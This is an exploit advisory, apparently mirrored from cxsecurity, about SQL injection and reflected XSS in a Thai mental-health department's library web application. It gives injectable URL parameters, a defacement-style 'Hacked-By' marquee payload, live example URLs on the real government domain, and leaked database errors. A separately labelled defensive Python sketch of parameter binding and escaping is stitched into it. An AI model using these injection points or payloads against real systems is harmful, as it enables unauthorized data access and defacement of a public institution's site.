Thailand Ministry of Public and Mental Health Union Library Management SQL Injection - Reflected Cross Site Scripting

CVE : Not available
Category : CWE-89
Price : Not specified
Severity : High
Author : Not disclosed
Risk : High
Exploitation Type : Remote
Date : 2019-04-18
CPE : cpe:cpe:/a:thailand-ministry-of-public-and-mental-health-union-library-management-sql-injection-reflected-cro
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040178

Below is a copy:

Thailand Ministry of Public and Mental Health Union Library Management SQL Injection - Reflected Cross Site Scripting
###################################################################

# Exploit Title : Thailand Ministry of Public and Mental Health Union Library Management SQL Injection - Reflected Cross Site Scripting
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/04/2019
# Vendor Homepage : dmh.go.th
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : Library dmh.go.th ULibM (Union Library Management)
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
* Thailand Ministry of Public Health Department of Mental Health is prone to an SQL-injection
vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an
SQL query. Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application and execute
arbitrary SQL commands in the application's database. Further exploitation of this vulnerability
may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser or with any SQL Injector Tool.

* Cross Site Scripting : The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is used as a web page that is
served to other users.

Cross-site scripting (XSS) vulnerabilities occur when:
**********************************************
1. Untrusted data enters a web application, typically from a web request.
2. The web application dynamically generates a web page that contains this untrusted data.
3. During page generation, the application does not prevent the data from containing 
content that is executable by a web browser, such as JavaScript, HTML tags, 
HTML attributes, mouse events, Flash, ActiveX, etc.
4. A victim visits the generated web page through a web browser, which contains 
malicious script that was injected using the untrusted data.
5. Since the script comes from a web page that was sent by the web server, 
the victim's web browser executes the malicious script in the context of the 
web server's domain.
6. This effectively violates the intention of the web browser's same-origin policy, 
which states that scripts in one domain should not be able to access 
resources or run code in a different domain.

There are three main kinds of XSS:

Type 1: Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP 
request and reflects it back in the HTTP response. Reflected XSS exploits occur when an 
attacker causes a victim to supply dangerous content to a vulnerable web application, 
which is then reflected back to the victim and executed by the web browser. The most common 
mechanism for delivering malicious content is to include it as a parameter in a URL that is 
posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute 
the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
the content is executed by the victim's browser.

Type 2: Stored XSS (or Persistent) :
********************************
The application stores dangerous data in a database, 
message forum, visitor log, or other trusted data store. At a later time, the dangerous data is 
subsequently read back into the application and included in dynamic content. From an attacker's 
perspective, the optimal place to inject malicious content is in an area that is displayed to either 
many users or particularly interesting users. Interesting users typically have elevated privileges
in the application or interact with sensitive data that is valuable to the attacker. If one of these users
executes malicious content, the attacker may be able to perform privileged operations on behalf of
the user or gain access to sensitive data belonging to the user. For example, the attacker might 
inject XSS into a log message, which might not be handled properly when an administrator views the logs.

Type 0: DOM-Based XSS :
***************************
In DOM-based XSS, the client performs the injection of XSS 
into the page; in the other types, the server performs the injection. DOM-based XSS generally
involves server-controlled, trusted script that is sent to the client, such as JavaScript that 
performs sanity checks on a form before the user submits it. If the server-supplied script 
processes user-supplied data and then injects it back into the web page 
(such as with dynamic HTML), then DOM-based XSS is possible. Once the malicious script is 
injected, the attacker can perform a variety of malicious activities. The attacker could transfer 
private information, such as cookies that may include session information, from the victim's 
machine to the attacker. The attacker could send malicious requests to a web site on behalf 
of the victim, which could be especially dangerous to the site if the victim has administrator 
privileges to manage that site. Phishing attacks could be used to emulate trusted web sites 
and trick the victim into entering a password, allowing the attacker to compromise the 
victim's account on that web site. Finally, the script could exploit a vulnerability in the 
web browser itself, possibly taking over the victim's machine, sometimes 
referred to as "drive-by hacking."

In many cases, the attack can be launched without the victim even being aware of it. 
Even with careful users, attackers frequently use a variety of methods to encode the 
malicious portion of the attack, such as URL encoding or Unicode, so the request 
looks less suspicious.

###################################################################

# SQL Injection Exploit :
**********************
/dmh/searching.php?MSUBJECT=[SQL Injection]

/raja/dublin.php?ID=[SQL Injection]

/camri/search-browse-author.php?&startrow=[SQL Injection]

/sp/search-browse-title.php?&startrow=[SQL Injection]

/sp/webbox/searching.misc/search.php?KW=Research&indexcode=su&startrow=[SQL Injection]

# XSS Cross Site Scripting Exploit :
********************************
/raja/dublin.php?ID=V2%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked-By-KingSkrupellos-XSS-Cross-Site-
Scripting-Vulnerability-Found%3C/font%3E%3C/marquee%3E

###################################################################

# Example Vulnerable Sites :
*************************
[+] library.dmh.go.th/raja/dublin.php?ID=562%27

[+] library.dmh.go.th/raja/dublin.php?ID=V2%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked-By-KingSkrupellos-XSS-Cross-Site-
Scripting-Vulnerability-Found%3C/font%3E%3C/marquee%3E

###################################################################

# Example SQL Database Error :
****************************
mysqli: You have an error in your SQL syntax; check the manual that corresponds 
to your MariaDB server version for the right syntax to use near '\'' at line 1
select * from media where id =562\' 

mysqli: You have an error in your SQL syntax; check the manual that corresponds 
to your MariaDB server version for the right syntax to use near '\',20' at line 1
select * from index_db order by trim(titl)  LIMIT 80\',20

mysqli: You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '\',20' at line 2
select mid,id from index_db where (ispublish='yes' or remoteindex<>'localDB')
 and   (1  AND (subj like '%Research%') 
 )   order by if(titl = '' or titl is null,1,0),titl asc LIMIT 40\',20
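The errors above show the ID and startrow values were backslash-escaped (the `\'`) yet placed unquoted into the query text, so escaping alone could not protect these integer parameters. The Python model below is an added, defender-side illustration, not code from the advisory, its author or the ULibM project (which, per the `.php` endpoints and `mysqli:` errors, is PHP on MariaDB): it validates those parameters as integers, binds them as query parameters (the LIMIT clause included), and HTML-escapes ID before reflecting it. The in-memory SQLite tables, column names and sample rows are constructed assumptions modelled on the queries in the error messages, not the project's real schema.

```python
import html
import sqlite3
from typing import Optional

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the 'media' and 'index_db' tables
    named in the advisory's MariaDB errors (assumed schema, not ULibM's)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table media (id integer primary key, titl text)")
    db.execute("create table index_db (mid integer, id integer, titl text, subj text, ispublish text)")
    db.executemany("insert into media values (?, ?)",
                   [(562, "Mental health survey"), (563, "Annual report")])
    db.executemany("insert into index_db values (?, ?, ?, ?, ?)",
                   [(1, 562, "Mental health survey", "Research", "yes"),
                    (2, 563, "Annual report", "Research", "yes"),
                    (3, 564, "Draft record", "Research", "no")])
    return db

def parse_int_param(raw: str, lo: int = 0, hi: int = 1_000_000) -> Optional[int]:
    """Accept only a plain decimal integer in [lo, hi]. Inputs such as
    "562'", "80',20" or "V2<marquee>" are rejected before any SQL is built."""
    if not raw.isdecimal():
        return None
    value = int(raw)
    return value if lo <= value <= hi else None

def lookup_media(db: sqlite3.Connection, raw_id: str):
    """Hardened counterpart of "select * from media where id =<ID>": the
    id is validated, then bound as a parameter rather than concatenated."""
    media_id = parse_int_param(raw_id)
    if media_id is None:
        return None
    return db.execute("select id, titl from media where id = ?",
                      (media_id,)).fetchone()

def browse_titles(db: sqlite3.Connection, raw_startrow: str, page_size: int = 20):
    """Hardened counterpart of "... order by trim(titl) LIMIT <startrow>,20":
    the LIMIT/OFFSET values are bound too, not spliced into the string."""
    start = parse_int_param(raw_startrow)
    if start is None:
        return None
    rows = db.execute("select titl from index_db where ispublish = 'yes'"
                      " order by trim(titl) limit ? offset ?", (page_size, start))
    return [r[0] for r in rows]

def render_id(raw_id: str) -> str:
    """Reflect the ID parameter only after HTML-escaping it, so markup such as
    <marquee> in the request is displayed as text, not interpreted."""
    return "<p>No record for ID " + html.escape(raw_id, quote=True) + "</p>"
```

A rejected parameter should produce a generic error page; echoing the raw database error, as the site above does, hands the query text to the requester.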

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.
